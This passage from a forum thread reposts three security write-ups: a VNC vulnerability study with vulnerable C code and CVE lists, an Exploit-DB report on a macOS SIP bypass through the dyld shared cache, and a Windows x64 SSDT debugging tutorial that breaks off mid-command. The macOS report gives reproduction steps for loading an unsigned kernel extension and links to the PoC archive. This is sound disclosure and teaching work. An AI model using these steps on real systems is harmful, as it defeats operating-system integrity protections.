protocol. Recommended by many industrial automation system vendors for connecting to HMI interfaces from *nix machines. TurboVNC – an open-source VNC implementation. Uses the libjpeg-turbo library to compress JPEG images in order to accelerate image transfer. As part of our research, we did not analyze the security of a very popular product called RealVNC, because the product’s license does not allow reverse engineering. Prior research Before beginning to analyze VNC implementations, it is essential to do reconnaissance and see what vulnerabilities have already been identified in each of them. In 2014, the Google Security Team published a small LibVNC vulnerability analysis report. Since the project includes a very small amount of code, it could be assumed that Google engineers had identified all vulnerabilities existing in LibVNC. However, I was able to find several issues on GitHub (for example, this and this), which were created later than 2014. The number of vulnerabilities identified in the UltraVNC project is not large. Most of these vulnerabilities have to do with the exploitation of a simple stack overflow with arbitrary length data being written to a fixed-size buffer on the stack. All known vulnerabilities were found a relatively long time ago. Since then, project codebase has grown, while the older codebase was found to include old vulnerabilities. Research findings LibVNC After analyzing previously identified vulnerabilities, I fairly easily found variants of some of these vulnerabilities in the code of the extension providing file transfer functionality. The extension is not enabled by default: developers must explicitly allow it to be used in their LibVNC based projects. This is probably why these vulnerabilities had not been identified before. Next, I moved on from analyzing server code to researching the client part. It was there that I found vulnerabilities which had the most critical importance for the project and which were also quite diverse. Among the vulnerabilities identified, it is worth mentioning several classes of vulnerabilities that will also come up in other projects based on the RFB protocol. It can be said that each of these classes was made possible by the way the protocol’s specification is designed. More precisely, the protocol’s specification is designed in a way that does not guard developers against these classes of bugs, enabling such flaws to appear in the code. As an illustration of this point, you can look at the structures used in VNC projects to handle network messages. For example, open the rfbproto.h file, which has been used by generations of VNC project developers since 1999. The file is included in the LibVNC project, among others. An excellent example for demonstrating the first class of vulnerabilities is the rfbClientCutTextMsg structure, which is used to send information on cut buffer changes on the client to the server. 1 2 3 4 5 6 7 typedef struct { uint8_t type; /* always rfbClientCutText */ uint8_t pad1; uint16_t pad2; uint32_t length; /* followed by char text[length] */ } rfbClientCutTextMsg; After establishing a connection and performing an initial handshake, during which the client and the server agree to use specific screen settings, all messages transferred have the same format. Each message starts with one byte, which represents the message type. Depending on message type, a message handler and structure matching the type are selected. In different VNC clients, the structure is filled in more or less in the same way (pseudocode in C): 1 ReadFullData(socket, ((char *)&msg) + 1, sz_rfbServerSomeMessageType – 1); In this way, the entire message structure is filled in, with the exception of the first byte, which defines the message type. It can be seen that all fields in the structure are controlled by the remote user. It should also be noted that msg is a union, which consists of all possible message structures. Since the contents of the cut buffer has an unspecified length, memory will be allocated for it dynamically, using malloc . It should also be remembered that the cut buffer field should presumably contain text and it is customary to terminate text data with the zero character in the C language. Given all this, as well as the fact that the field length has the type uint32_t and is fully controlled by the remote user, in this case we have a typical integer overflow (pseudocode in C): 1 2 3 char *text = malloc(msg.length + 1); ReadFullData(socket, text, msg.length); text[msg.length] = 0; If an attacker sends a message length field with a value equal to UINT32_MAX = 232– 1 = 0xffffffff, the function malloc(0) will be called as a result of an integer overflow. If the standard glibc malloc memory allocation mechanism is used, the call will return a chunk of the smallest possible size – 16 bytes. At the same time, a length equal to UINT32_MAX will be passed to the ReadFullData function as an argument, which, in the case of LibVNC, will result in a heap-based buffer overflow. The second vulnerability type can be demonstrated on the same structure. As one can read in the specification or the RFC, some structures include padding for field alignment. However, from a security researcher’s viewpoint, this is just one more opportunity to discover a memory initialization error (see here and here). Let’s have a look at this typical error (pseudocode in C): 1 2 3 4 5 rfbClientCutTextMsg cct; cct.type = rfbClientCutText; cct.length = length; WriteToRFBServer(socket, &cct, sz_rfbClientCutTextMsg); WriteToRFBServer(socket, str, len); The message structure is created on the stack, after which some of its fields are filled in and the structure is sent to the server. It can be seen that the structures pad1 and pad2 remain empty. As a result of this, an uninitialized variable is sent over the network and an attacker can read uninitialized memory from the stack. If the attacker is in luck, the memory area that the attacker is able to access may contain the address of the heap, stack or text section, enabling the attacker to bypass ASLR and use overflow to achieve remote code execution on the client. Such trivial vulnerabilities have been found in VNC projects sufficiently often, which is why we decided to place them into separate classes. It is worth noting that analyzing such projects as LibVNC, which are positioned as cross-platform solutions, is not an easy task. While doing research on such projects, one should ignore anything that has to do with the specific OS and architecture of the researcher’s computer and view the project exclusively through the prism of the C language standard, otherwise it’s easy to miss some obvious flaws in code, which can only be reproduced on a specific platform. For example, in this case, the heap overflow vulnerability was incorrectly fixed on the 32 bit platform because the size or the size_t type on the x86_64 platform is different from the same type’s size on the 32 bit x86 platform. Information on all vulnerabilities identified was provided to developers and the vulnerabilities were closed (some even twice, thanks to Solar Designer for the help). TightVNC The next target for research was a fairly popular VNC client implementation for GNU/Linux. I was able to identify vulnerabilities in that system very quickly, because most were fairly straightforward and some were identical to those found in LibVNC. Two code fragments from two different projects are compared below. Originally, this vulnerability was identified in the LibVNC project, in the CoRRE decoding method (see code on the right-hand side). In the above code fragment, data of arbitrary length is read to a fixed-length buffer inside the rfbClient structure. This naturally results in buffer overflow. By a curious coincidence, function pointers are located inside the structure, almost right after the cut buffer, which almost immediately results in code execution. It can be observed that, with the exception of some minor variations, the code fragments from LibVNC and TightVNC can be considered identical. Both fragments were copied from the AT&T Laboratories. The developers introduced this vulnerability back in 1999. (I was able to determine this through the AT&T Laboratories license, in which developers usually specify who was involved in the development project during different time periods.) That code has been modified several times since then – for example, in LibVNC the static global buffer was moved to the client’s structure – but the vulnerability survived all the modifications. It is also worth noting that HandleCoRREBPP is a rather original name. If you search the code of projects on GitHub for this character combination, you can find lots of VNC-related projects that thoughtlessly copied the vulnerable decoding function carrying this name or the entire LibVNC library. This is why these projects may remain vulnerable forever – unless the developers update the contents of their projects or fix the vulnerability in the code themselves. The character combination HandleCoRREBPP is in fact not a function name. BPP in this case stands for “Bits per Pixel” and is a number equal to 8, 16 or 32, depending on the color depth agreed on by the client and the server at the initialization stage. It is assumed that developers will use this file as an auxiliary file in their macros as follows: 1 2 3 4 5 #ifndef HandleCoRRE8 #define BPP 32 #include ”corre.h” #undef BPP #endif The result is several functions: HandleCoRRE8, HandleCoRRE16 and HandleCoRRE32. Since the program was originally written in C rather than C++, the developers had to come up with such tricks because there were no templates available. However, if you google the function name HandleCoRRE or HandleCoRRE32, you may discover that there are projects which were slightly modified, either using or not using patterns, but which still contain the vulnerability. Unfortunately, there are hundreds of projects in which this code was included without any changes or copied and it is not always possible to contact their developers. The sad story of TightVNC does not end here. When we reported the vulnerabilities to TightVNC developers, they thanked us for the information and let us know that they had discontinued the development of the TightVNC 1.X line and no longer fixed any vulnerabilities found, because it had become uneconomical for their company. At some point, GlavSoft began to develop a new line, TightVNC 2.X, which does not include any GPL-licensed third-party code and which can therefore be developed as a commercial product. It should be noted that TightVNC 2.X for Unix systems is distributed only under commercial licenses and should not be expected to be released as open source software. We reported the vulnerabilities identified in TightVNC oss-security and emphasized that package maintainers needed to fix these vulnerabilities by themselves. Although we sent our notification to package maintainers in January 2019, the vulnerabilities had not been fixed at the time of this article’s publication (November 2019). TurboVNC This VNC project deserves a special ‘prize’: the one vulnerability identified in it is mind-boggling. Consider a C code fragment taken from the main server function designed to handle user messages: 1 2 3 4 5 6 7 8 9 char data[64]; READ(((char *)&msg) + 1, sz_rfbFenceMsg – 1) READ(data, msg.f.length) if (msg.f.length > sizeof(data)) rfbLog("Ignoring fence. Payload of %d bytes is too large.\n", msg.f.length); else HandleFence(cl, flags, msg.f.length, data); return; This code fragment reads a message in the rfbFenceType format. The message provides the server with information on the length msg.f.length of type uint8_t user data, which follows the message. This is obviously the case of arbitrary user data being read into a fixed-size buffer, resulting in stack overflow. Importantly, a check of the length of the data read is performed after the data has been read into the buffer. Due to the absence of overflow protection on the stack (a so-called canary), this vulnerability makes it possible to control return addresses and, consequently, to achieve remote code execution on the server. An attacker would, however, first need to obtain authentication credentials to connect to the VNC server or gain control of the client before the connection is established. UltraVNC In UltraVNC, I was able to identify multiple vulnerabilities in both the server and the client components of the project, to which 22 CVE IDs were assigned. A distinguishing feature of this project is its focus on Windows systems. When analyzing projects that can be compiled for GNU/Linux, I prefer to take two different approaches to vulnerability search. First, I analyze the code, looking for vulnerabilities in it. Second, I try to figure out how the search for vulnerabilities in the project can be automated using fuzzing. This is what I did when analyzing LibVNC, TurboVNC, and TightVNC. For such projects, it is very easy to write a wrapper for libfuzzer, since the project does not depend on a specific operating system’s implementation of the network API – there is an additional abstraction layer implemented for that. To write a good fuzzer, all you have to do is implement the target function on your own, as well as rewrite the networking functions. This will allow data from the fuzzer to be fed to the program – as if it was transferred over the network. However, in the case of analyzing projects for Windows, the latter technique is difficult to use even with open-source projects because the relevant tools are either not available or poorly developed. At the time of the analysis, libfuzzer for Windows had not yet been released. In addition, the event-oriented approach used in Windows application development means that a very large amount of code would have to be rewritten to achieve good fuzzing coverage. Because of this, I used only manual code analysis when analyzing UltraVNC for vulnerabilities. As a result of this analysis, I found an entire ‘zoo’ of vulnerabilities in UltraVNC – from trivial buffer overflows in strcpy and sprintf to more or less curious vulnerabilities that can rarely be encountered in real-world projects. Below we discuss some of these vulnerabilities. CVE-2018-15361 This vulnerability exists in UltraVNC client-side code. At the initialization stage, the server should provide information on display height and width, color depth, palette and name of the desktop, which can be displayed, for example, in the title bar of the window. The name of the desktop is a string of an undefined length. Consequently, the string’s length is sent to the client first, followed by the string itself. The relevant fragment of code is shown below: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 void ClientConnection::ReadServerInit() { ReadExact((char *)&m_si, sz_rfbServerInitMsg); m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); m_desktopName = new TCHAR[m_si.nameLength + 4 + 256]; m_desktopName_viewonly = new TCHAR[m_si.nameLength + 4 + 256+16]; ReadString(m_desktopName, m_si.nameLength); . . . } The attentive reader will make the correct observation that the above code contains an integer overflow vulnerability. However, in this case the vulnerability leads not to heap-based buffer overflow in the ReadString function but to more curious consequences. 1 2 3 4 5 6 void ClientConnection::ReadString(char *buf, int length) { if (length > 0) ReadExact(buf, length); buf[length] = '\0'; } It can be seen that the ReadString function is designed to read a string of the length length and terminate it with a zero. It is worth noting that the function takes the signed type as its second argument. If we specify a very large number in m_si.nameLength, it will be treated as a negative number when passed to the ReadString function as an argument. This will result in length failing the positivity check and the buf array remaining unitialized. Only one thing that will happen: a null byte will be written at offset buf + length. Given that length is a negative number, this makes it possible to write the null byte at a fixed negative offset relative to buf. The upshot of this is that if an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, this will make it possible to write the null byte to the previous chunk. If an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap allocated for it. With the right parameters, a remote attacker would be able to write a null byte to the _NT_HEAP structure, which will be located directly before a huge chunk. This vulnerability is guaranteed to cause a DoS, but the question of the ability to achieve remote code execution remains open. I wouldn’t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to. CVE-2019-8262 The vulnerability was identified in the handler of data encoded using the Ultra encoding. It demonstrates that the security and availability of this functionality really hung by a very thin thread. The handler uses the lzo1x_decompress function from the minilzo library. To understand what the vulnerability is, one has to look at the prototypes of compression and decompression functions. To call the decompression function, one has to pass the buffer containing compressed data, compressed data length, the buffer to which the data should be unpacked and its length as inputs. It should be kept in mind that the function may return an error if the input data cannot be decompressed. In addition, the developer needs to know the exact length of the data that will be unpacked to the output buffer. This means that, in addition to the error code, the function should return a value equal to the number of bytes written. For example, the argument that is used to pass the write buffer length can be used for this, provided that it is passed by pointer. In that case the minimum interface of the decompression function will look as follows: 1 int decompress(const unsigned char *in, size_t in_len, unsigned char *out, size_t *out_len) The first four parameters of this function are the same as the first four parameters of the lzo1x_decompress function. Now consider the fragment of UltraVNC code that contains the critical heap overflow vulnerability. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 void ClientConnection::ReadUltraRect(rfbFramebufferUpdateRectHeader *pfburh) { UINT numpixels = pfburh->r.w * pfburh->r.h; UINT numRawBytes = numpixels * m_minPixelBytes; UINT numCompBytes; lzo_uint new_len; rfbZlibHeader hdr; // Read in the rfbZlibHeader omni_mutex_lock l(m_bitmapdcMutex); ReadExact((char *)&hdr, sz_rfbZlibHeader); numCompBytes = Swap32IfLE(hdr.nBytes); CheckBufferSize(numCompBytes); ReadExact(m_netbuf, numCompBytes); CheckZlibBufferSize(numRawBytes); lzo1x_decompress((BYTE*)m_netbuf,numCompBytes,(BYTE*)m_zlibbuf,&new_len,NULL); . . . } As you can see, UltraVNC developers do not check the lzo1x_decompress return code, which is, however, insignificant compared to another flaw – the improper use of new_len. The uninitialized variable new_len is passed to the lzo1x_decompress function. At the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer. In addition, while debugging vncviewer.exe (the executable file was taken from a build on the UltraVNC official website), I was able to find out why this code had passed the testing stage. It turned out that the problem was that, since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer’s boundary, resulting in heap overflow. Conclusion In conclusion, I would like to mention that while doing the research I often couldn’t help thinking that the vulnerabilities I found were too unsophisticated to have been missed by everyone before. However, it was true. Each of these vulnerabilities had a very long lifetime. Some of the vulnerability classes identified in the study are present in a large number of open-source projects, surviving even codebase refactoring. I believe it is very important to be able to systematically identify such sets of vulnerable projects containing vulnerabilities that are not always inherited in clear ways. Almost none of the projects analyzed are unit tested; programs are not systematically tested for security using static code analysis or fuzzing. Magic constants that are abundant in code make it similar to a house of cards: just one constant changed in this unstable structure could result in a new vulnerability. Here are our recommendations for developers and vendors that use third-party VNC project code in their products: Set up a bug tracking mechanism in all third-party VNC projects used and regularly update their code to the latest release. Add compilation options that make it harder for attackers to exploit any vulnerabilities that may exist in the code. Even if researchers are not able to identify all the vulnerabilities in a project, exploiting them should be made as difficult as possible. For example, some of the vulnerabilities described in this article would be impossible to exploit to achieve remote code execution if the project was compiled as a position-independent executable (PIE). In that case, the vulnerabilities would remain, but their exploitation would lead to denial of service (DoS) rather than RCE. Another example is the unfortunate experience with TurboVNC: the compiler can sometimes optimize the procedure of checking the stack canary. Some compilers perform such optimizations by removing stack canary checks from the functions that don’t have explicitly allocated arrays. However, the compiler could make a mistake and fail to check for the presence of a buffer in some of the structures on the stack or in switch-case statements (which is what probably happened in the case of TurboVNC). To make it impossible to exploit a vulnerability that has been identified, the compiler should be explicitly told that the stack canary checking procedure should not be optimized. Perform fuzzing and testing of the project on all architectures for which the project is made available. Some vulnerabilities may manifest themselves only on one of the platforms due to its specific features. Be sure to use sanitizers in the process of fuzzing and at the testing stage. For example, a memory sanitizer is guaranteed to identify such vulnerabilities as the use if uninitialized values. On the positive side, password authentication is often required to exploit server-side vulnerabilities, and the server may not allow users to configure a password-free authentication method for security reasons. This is the case, for example, with UltraVNC. As a safeguard against attacks, clients should not connect to unknown VNC servers and administrators should configure authentication on the server using a unique strong password. The following vulnerabilities were registered based on this research: LibVNC CVE-2018-6307 CVE-2018-15126 CVE-2018-15127 CVE-2018-20019 CVE-2018-20020 CVE-2018-20021 CVE-2018-20022 CVE-2018-20023 CVE-2018-20024 CVE-2019-15681 TightVNC CVE-2019-8287 CVE-2019-15678 CVE-2019-15679 CVE-2019-15680 TurboVNC CVE-2019-15683 UltraVNC CVE-2018-15361 CVE-2019-8258 CVE-2019-8259 CVE-2019-8260 CVE-2019-8261 CVE-2019-8262 CVE-2019-8263 CVE-2019-8264 CVE-2019-8265 CVE-2019-8266 CVE-2019-8267 CVE-2019-8268 CVE-2019-8269 CVE-2019-8270 CVE-2019-8271 CVE-2019-8272 CVE-2019-8273 CVE-2019-8274 CVE-2019-8275 CVE-2019-8276 CVE-2019-8277 CVE-2019-8280 To be continued… Download PDF version Pavel Cheremushkin Security Researcher, KL ICS CERT Sursa: https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/
  19. Tested on macOS Mojave (10.14.6, 18G87) and Catalina Beta (10.15 Beta 19A536g). On macOS, the dyld shared cache (in /private/var/db/dyld/) is generated locally on the system and therefore doesn't have a real code signature; instead, SIP seems to be the only mechanism that prevents modifications of the dyld shared cache. update_dyld_shared_cache, the tool responsible for generating the shared cache, is able to write to /private/var/db/dyld/ because it has the com.apple.rootless.storage.dyld entitlement. Therefore, update_dyld_shared_cache is responsible for ensuring that it only writes data from trustworthy libraries when updating the shared cache. update_dyld_shared_cache accepts two interesting command-line arguments that make it difficult to enforce these security properties: - "-root": Causes libraries to be read from, and the cache to be written to, a caller-specified filesystem location. - "-overlay": Causes libraries to be read from a caller-specified filesystem location before falling back to normal system directories. There are some checks related to this, but they don't look very effective. main() tries to see whether the target directory is protected by SIP: bool requireDylibsBeRootlessProtected = isProtectedBySIP(cacheDir); If that variable is true, update_dyld_shared_cache attempts to ensure that all source libraries are also protected by SIP. isProtectedBySIP() is implemented as follows: bool isProtectedBySIP(const std::string& path) { if ( !sipIsEnabled() ) return false; return (rootless_check_trusted(path.c_str()) == 0); } Ignoring that this looks like a typical symlink race issue, there's another problem: Looking in a debugger (with SIP configured so that only debugging restrictions and dtrace restrictions are disabled), it seems like rootless_check_trusted() doesn't work as expected: bash-3.2# lldb /usr/bin/update_dyld_shared_cache [...] (lldb) breakpoint set --name isProtectedBySIP(std::__1::basic_string<char,\ std::__1::char_traits<char>,\ std::__1::allocator<char>\ >\ const&) Breakpoint 1: where = update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&), address = 0x00000001000433a4 [...] (lldb) run -force Process 457 launched: '/usr/bin/update_dyld_shared_cache' (x86_64) Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 1.1 frame #0: 0x00000001000433a4 update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433a4 <+0>: pushq %rbp 0x1000433a5 <+1>: movq %rsp, %rbp 0x1000433a8 <+4>: pushq %rbx 0x1000433a9 <+5>: pushq %rax Target 0: (update_dyld_shared_cache) stopped. (lldb) breakpoint set --name rootless_check_trusted Breakpoint 2: where = libsystem_sandbox.dylib`rootless_check_trusted, address = 0x00007fff5f32b8ea (lldb) continue Process 457 resuming Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1 frame #0: 0x00007fff5f32b8ea libsystem_sandbox.dylib`rootless_check_trusted libsystem_sandbox.dylib`rootless_check_trusted: -> 0x7fff5f32b8ea <+0>: pushq %rbp 0x7fff5f32b8eb <+1>: movq %rsp, %rbp 0x7fff5f32b8ee <+4>: movl $0xffffffff, %esi ; imm = 0xFFFFFFFF 0x7fff5f32b8f3 <+9>: xorl %edx, %edx Target 0: (update_dyld_shared_cache) stopped. (lldb) print (char*)$rdi (char *) $0 = 0x00007ffeefbff171 "/private/var/db/dyld/" (lldb) finish Process 457 stopped * thread #1, queue = 'com.apple.main-thread', stop reason = step out frame #0: 0x00000001000433da update_dyld_shared_cache`isProtectedBySIP(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > const&) + 54 update_dyld_shared_cache`isProtectedBySIP: -> 0x1000433da <+54>: testl %eax, %eax 0x1000433dc <+56>: sete %al 0x1000433df <+59>: addq $0x8, %rsp 0x1000433e3 <+63>: popq %rbx Target 0: (update_dyld_shared_cache) stopped. (lldb) print $rax (unsigned long) $1 = 1 Looking around with a little helper (under the assumption that it doesn't behave differently because it doesn't have the entitlement), it looks like only a small part of the SIP-protected directories show up as protected when you check with rootless_check_trusted(): bash-3.2# cat rootless_test.c #include <stdio.h> int rootless_check_trusted(char *); int main(int argc, char **argv) { int res = rootless_check_trusted(argv[1]); printf("rootless status for '%s': %d (%s)\n", argv[1], res, (res == 0) ? "PROTECTED" : "MALLEABLE"); } bash-3.2# ./rootless_test / rootless status for '/': 1 (MALLEABLE) bash-3.2# ./rootless_test /System rootless status for '/System': 0 (PROTECTED) bash-3.2# ./rootless_test /System/ rootless status for '/System/': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library rootless status for '/System/Library': 0 (PROTECTED) bash-3.2# ./rootless_test /System/Library/Assets rootless status for '/System/Library/Assets': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches rootless status for '/System/Library/Caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /System/Library/Caches/com.apple.kext.caches rootless status for '/System/Library/Caches/com.apple.kext.caches': 1 (MALLEABLE) bash-3.2# ./rootless_test /usr rootless status for '/usr': 0 (PROTECTED) bash-3.2# ./rootless_test /usr/local rootless status for '/usr/local': 1 (MALLEABLE) bash-3.2# ./rootless_test /private rootless status for '/private': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db rootless status for '/private/var/db': 1 (MALLEABLE) bash-3.2# ./rootless_test /private/var/db/dyld/ rootless status for '/private/var/db/dyld/': 1 (MALLEABLE) bash-3.2# ./rootless_test /sbin rootless status for '/sbin': 0 (PROTECTED) bash-3.2# ./rootless_test /Applications/Mail.app/ rootless status for '/Applications/Mail.app/': 0 (PROTECTED) bash-3.2# Perhaps rootless_check_trusted() limits its trust to paths that are writable exclusively using installer entitlements like com.apple.rootless.install, or something like that? That's the impression I get when testing different entries from /System/Library/Sandbox/rootless.conf - the entries with no whitelisted specific entitlement show up as protected, the ones with a whitelisted specific entitlement show up as malleable. rootless_check_trusted() checks for the "file-write-data" permission through the MAC syscall, but I haven't looked in detail at how the policy actually looks. (By the way, looking at update_dyld_shared_cache, I'm not sure whether it would actually work if the requireDylibsBeRootlessProtected flag is true - it looks like addIfMachO() would never add any libraries to dylibsForCache because `sipProtected` is fixed to `false` and the call to isProtectedBySIP() is commented out?) In theory, this means it's possible to inject a modified version of a library into the dyld cache using either the -root or the -overlay flag of update_dyld_shared_cache, reboot, and then run an entitled binary that will use the modified library. However, there are (non-security) checks that make this annoying: - When loading libraries, loadPhase5load() checks whether the st_ino and st_mtime of the on-disk library match the ones embedded in the dyld cache at build time. - Recently, dyld started ensuring that the libraries are all on the "boot volume" (the path specified with "-root", or "/" if no root was specified). The inode number check means that it isn't possible to just create a malicious copy of a system library, run `update_dyld_shared_cache -overlay`, and reboot to use the malicious copy; the modified library will have a different inode number. I don't know whether HFS+ reuses inode numbers over time, but on APFS, not even that is possible; inode numbers are monotonically incrementing 64-bit integers. Since root (and even normal users) can mount filesystem images, I decided to create a new filesystem with appropriate inode numbers. I think HFS probably can't represent the full range of inode numbers that APFS can have (and that seem to show up on volumes that have been converted from HFS+ - that seems to result in inode numbers like 0x0fffffff00001666), so I decided to go with an APFS image. Writing code to craft an entire APFS filesystem would probably take quite some time, and the public open-source APFS implementations seem to be read-only, so I'm first assembling a filesystem image normally (create filesystem with newfs_apfs, mount it, copy files in, unmount), then renumbering the inodes. By storing files in the right order, I don't even need to worry about allocating and deallocating space in tree nodes and such - all replacements can be performed in-place. My PoC patches the cached version of csr_check() from libsystem_kernel.dylib so that it always returns zero, which causes the userspace kext loading code to ignore code signing errors. To reproduce: - Ensure that SIP is on. - Ensure that you have at least something like 8GiB of free disk space. - Unpack the attached dyld_sip.tar (as normal user). - Run ./collect.sh (as normal user). This should take a couple minutes, with more or less continuous status updates. At the end, it should say "READY" after mounting an image to /private/tmp/L. (If something goes wrong here and you want to re-run the script, make sure to detach the volume if the script left it attached - check "hdiutil info".) - As root, run "update_dyld_shared_cache -force -root /tmp/L". - Reboot the machine. - Build an (unsigned) kext from source. I have attached source code for a sample kext as testkext.tar - you can unpack it and use xcodebuild -, but that's just a simple "hello world" kext, you could also use anything else. - As root, copy the kext to /tmp/. - As root, run "kextutil /tmp/[...].kext". You should see something like this: bash-3.2# cp -R testkext/build/Release/testkext.kext /tmp/ && kextutil /tmp/testkext.kext Kext with invalid signatured (-67050) allowed: <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } Code Signing Failure: code signature is invalid Disabling KextAudit: SIP is off Invalid signature -67050 for kext <OSKext 0x7fd10f40c6a0 [0x7fffa68438e0]> { URL = "file:///private/tmp/testkext.kext/", ID = "net.thejh.test.testkext" } bash-3.2# dmesg|tail -n1 test kext loaded bash-3.2# kextstat | grep test 120 0 0xffffff7f82a50000 0x2000 0x2000 net.thejh.test.testkext (1) A24473CD-6525-304A-B4AD-B293016E5FF0 <5> bash-3.2# Miscellaneous notes: - It looks like there's an OOB kernel write in the dyld shared cache pager; but AFAICS that isn't reachable unless you've already defeated SIP, so I don't think it's a vulnerability: vm_shared_region_slide_page_v3() is used when a page from the dyld cache is being paged in. It essentially traverses a singly-linked list of relocations inside the page; the offset of the first relocation (iow the offset of the list head) is stored permanently in kernel memory when the shared cache is initialized. As far as I can tell, this function is missing bounds checks; if either the starting offset or the offset stored in the page being paged in points outside the page, a relocation entry will be read from OOB memory, and a relocated address will conditionally be written back to the same address. - There is a check `rootPath != "/"` in update_dyld_shared_cache; but further up is this: // canonicalize rootPath if ( !rootPath.empty() ) { char resolvedPath[PATH_MAX]; if ( realpath(rootPath.c_str(), resolvedPath) != NULL ) { rootPath = resolvedPath; } // <rdar://problem/33223984> when building closures for boot volume, pathPrefixes should be empty if ( rootPath == "/" ) { rootPath = ""; } } So as far as I can tell, that condition is always true, which means that when an overlay path is specified with `-overlay`, the cache is written to the root even though the code looks as if the cache is intended to be written to the overlay. - Some small notes regarding the APFS documentation at <https://developer.apple.com/support/downloads/Apple-File-System-Reference.pdf>: - The typedef for apfs_superblock_t is missing. - The documentation claims that APFS_TYPE_DIR_REC keys are j_drec_key_t, but actually they can be j_drec_hashed_key_t. - The documentation claims that o_cksum is "The Fletcher 64 checksum of the object", but actually APFS requires that the fletcher64 checksum of all data behind the checksum concatenated with the checksum is zero. (In other words, you cut out the checksum field at the start, append it at the end, then run fletcher64 over the buffer, and then you have to get an all-zeroes checksum.) Proof of Concept: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/47708.zip Sursa: https://www.exploit-db.com/exploits/47708
  20. A Glimpse into SSDT inside Windows x64 Kernel What is SSDT System Service Dispatch Table or SSDT, simply is an array of addresses to kernel routines for 32 bit operating systems or an array of relative offsets to the same routines for 64 bit operating systems. SSDT is the first member of the Service Descriptor Table kernel memory structure as shown below: typedef struct tagSERVICE_DESCRIPTOR_TABLE { SYSTEM_SERVICE_TABLE nt; //effectively a pointer to Service Dispatch Table (SSDT) itself SYSTEM_SERVICE_TABLE win32k; SYSTEM_SERVICE_TABLE sst3; //pointer to a memory address that contains how many routines are defined in the table SYSTEM_SERVICE_TABLE sst4; } SERVICE_DESCRIPTOR_TABLE; SSDTs used to be hooked by AVs as well as rootkits that wanted to hide files, registry keys, network connections, etc. Microsoft introduced PatchGuard for x64 systems to fight SSDT modifications by BSOD'ing the system. In Human Terms When a program in user space calls a function, say CreateFile, eventually code execution is transfered to ntdll!NtCreateFile and via a syscall to the kernel routine nt!NtCreateFile. Syscall is merely an index in the System Service Dispatch Table (SSDT) which contains an array of pointers for 32 bit OS'es (or relative offsets to the Service Dispatch Table for 64 bit OSes) to all critical system APIs like ZwCreateFile, ZwOpenFile and so on.. Below is a simplified diagram that shows how offsets in SSDT KiServiceTable are converted to absolute addresses of corresponding kernel routines: Effectively, syscalls and SSDT (KiServiceTable) work togeher as a bridge between userland API calls and their corresponding kernel routines, allowing the kernel to know which routine should be executed for a given syscall that originated in the user space. Service Descriptor Table In WinDBG, we can check the Service Descriptor Table structure KeServiceDescriptorTable as shown below. Note that the first member is recognized as KiServiceTable - this is a pointer to the SSDT itself - the dispatch table (or simply an array) containing all those pointers/offsets: 0: kd> dps nt!keservicedescriptortable L4 fffff801`9210b880 fffff801`9203b470 nt!KiServiceTable fffff801`9210b888 00000000`00000000 fffff801`9210b890 00000000`000001ce fffff801`9210b898 fffff801`9203bbac nt!KiArgumentTable Let's try and print out a couple of values from the SSDT: 0: kd> dd /c1 KiServiceTable L2 fffff801`9203b470 fd9007c4 fffff801`9203b474 fcb485c0 As mentioned earlier, on x64 which is what I'm running in my lab, SSDT contains relative offsets to kernel routines. In order to get the absolute address for a given offset, the following formula needs to be applied: RoutineAbsoluteAddress = KiServiceTableAddress + (routineOffset >>> 4)RoutineAbsoluteAddress=KiServiceTableAddress+(routineOffset>>>4) Using the above formula and the first offset fd9007c4 we got from the KiServiceTable, we can work out that this offset is pointing to nt!NtAccessCheck: 0: kd> u KiServiceTable + (0xfd9007c4 >>> 4) nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp fffff801`91dcb4ef 4883ec68 sub rsp,68h fffff801`91dcb4f3 488b8424a8000000 mov rax,qword ptr [rsp+0A8h] fffff801`91dcb4fb 4533d2 xor r10d,r10d We can confirm it if we try to disassemble the nt!NtAccessCheck - routine addresses (fffff801`91dcb4ec) and first instructions (mov r11, rsp) of the above and below commands match: 0: kd> u nt!NtAccessCheck L1 nt!NtAccessCheck: fffff801`91dcb4ec 4c8bdc mov r11,rsp If we refer back to the original drawing on how SSDT offsets are converted to absolute addresses, we can redraw it with specific values for syscall 0x1: Finding a Dispatch Routine for a Given Userland Syscall As a simple exercise, given a known syscall number, we can try to work out what kernel routine will be called once that syscall is issued. Let's load the debugging symbols for ntdll module: .reload /f ntdll.dll lm ntdll Let's now find the syscall for ntdll!NtCreateFile: 0: kd> u ntdll!ntcreatefile L2 ...we can see the syscall is 0x55: Offsets in the KiServiceTable are 4 bytes in size, so we can work out the offset for syscall 0x55 by looking into the value the KiServiceTable holds at position 0x55: 0: kd> dd /c1 